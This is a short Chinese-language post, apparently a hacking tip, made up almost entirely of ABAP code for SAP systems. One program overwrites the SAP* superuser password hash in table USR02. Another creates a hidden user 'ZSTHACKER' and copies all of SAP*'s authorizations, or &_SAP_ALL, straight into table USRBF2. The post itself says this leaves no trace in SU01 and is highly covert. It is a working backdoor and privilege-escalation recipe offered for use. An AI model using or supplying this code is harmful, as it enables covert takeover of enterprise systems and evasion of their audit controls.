直接修改SAP*的密码为123.
report ZMODPWD.
tables :usr02 .
update usr02 set bcode = 'DF52478E6FF90EEB'
where BNAME = 'SAP*'.
------------------------------------------------------------------------------
建立用户ZSTHACKER(初始密码123qaz)并赋予SAP*用户的所有权限.
(通过程序随意建立用户并赋予所有权限的例子,此例的特点在于直接在用户授权对象表USRBF2中加入授权对象,使用SU01看不到任何迹象,隐蔽性较强.)
Program ZCRTUSER.
Data ZUSR02 like USR02 .
***1Create User ZSTHACKER according to DDIC
select single * into ZUSR02 from USR02
where BNAME = 'DDIC'.
ZUSR02-BNAME = 'ZSTHACKER'.
ZUSR02-Bcode = 'E3B796BB09F7901B' .
insert USR02 from ZUSR02 .
***2Copy Auth. Obj from SAP*(or other)
data ZUSRBF2 like USRBF2 occurs 0 with header line.
select * from USRBF2 into table ZUSRBF2
where BNAME = 'SAP*' .
Loop at ZUSRBF2.
ZUSRBF2-BNAME = 'ZSTHACKER' .
Modify ZUSRBF2 INDEX sy-tabix TRANSPORTING BNAME.
endloop.
INSERT USRBF2 FROM TABLE ZUSRBF2 ACCEPTING DUPLICATE KEYS.
如果SAP*被修改,直接从Tobj将所有的授权对象赋给ZSTHACKER就可.
Data Ztobj like tobj occurs 0 with header line .
data zusrbf2 like usrbf2.
select * into table ztobj from tobj .
loop at ztobj.
zusrbf2-mandt = sy-mandt.
zusrbf2-bname = 'ZSTHACKER'.
zusrbf2-objct = ztobj-objct.
zusrbf2-auth ='&_SAP_ALL'.
modify USRBF2 FROM zusrbf2 .
endloop .